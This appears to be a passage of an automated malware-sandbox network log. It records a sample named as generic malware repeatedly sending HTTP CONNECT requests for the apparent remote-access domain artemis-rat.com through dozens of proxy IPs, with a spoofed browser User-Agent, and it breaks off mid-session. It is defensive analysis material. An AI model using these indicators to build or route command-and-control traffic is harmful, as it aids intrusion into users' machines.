                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:27.005744934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1795192.168.2.45212845.11.95.16560117284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:27.011425018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1796192.168.2.452191209.222.97.30194817284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:27.055974007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1797192.168.2.452305162.214.121.173643827284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:27.059434891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.069665909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1798192.168.2.45228392.204.135.37165917284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:27.078799963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.163363934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:33.236955881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:39.350107908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:51.366204023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:15.522464037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:39:03.522562027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1799192.168.2.454485141.148.63.29807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:27.088375092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.257205009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:33.257313013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:39.257266045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:51.366269112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:03.366280079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1800192.168.2.455262184.170.249.6541457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:27.349847078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1801192.168.2.4552595.202.104.2231287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:27.350028038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1802192.168.2.45229934.81.72.31807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:27.350404024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:37.607992887 CET720INHTTP/1.1 500 Internal Server Error
                                              Date: Mon, 11 Mar 2024 07:37:37 GMT
                                              Server: Apache
                                              Content-Length: 544
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 2e 73 68 69 6c 6c 6f 6e 67 63 6f 6c 6c 65 67 65 2e 61 63 2e 69 6e 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster.shillongcollege.ac.in to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1803192.168.2.455260217.60.194.19831287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:27.358814955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1804192.168.2.45226941.65.236.3519767284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:27.368550062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.366647005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:33.366705894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:39.460227013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:51.553731918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:03.631846905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:15.631865025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:39.634354115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:39:27.631864071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1805192.168.2.454450158.160.49.25531287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:27.368578911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.366502047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:33.366456985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:39.366710901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1806192.168.2.45468172.49.49.11310347284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:27.372423887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1807192.168.2.454500121.139.218.165314097284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:27.375153065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1808192.168.2.45241937.44.238.2526117284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:27.375624895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.366662025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:33.366709948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:39.460246086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:51.556282997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:03.631999969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1809192.168.2.454774162.241.46.54468497284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:27.376461983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.866544008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.554301023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1810192.168.2.45239637.187.77.58135747284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:27.376669884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1811192.168.2.452370193.239.56.8480817284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:27.379918098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1812192.168.2.452378146.59.18.246306737284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:27.380244017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.366661072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1813192.168.2.454527103.255.147.102837284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:27.462073088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.154444933 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1814192.168.2.45466192.204.134.38297187284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:27.466655970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.367891073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.163379908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:36.757071018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:47.663161039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1815192.168.2.45463627.147.137.9080907284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:27.469224930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.949506044 CET19INHTTP/1.1 200 OK
                                              Mar 11, 2024 08:37:29.262346983 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1816192.168.2.452049112.5.33.1799997284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:27.470545053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1817192.168.2.455265124.163.236.5473027284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:28.433872938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.907866955 CET90INHTTP/1.1 200 OK
                                              Content-Type: application/json
                                              Connection: close
                                              Content-Length: 55


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1818192.168.2.45492492.205.110.118265707284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:28.437335014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
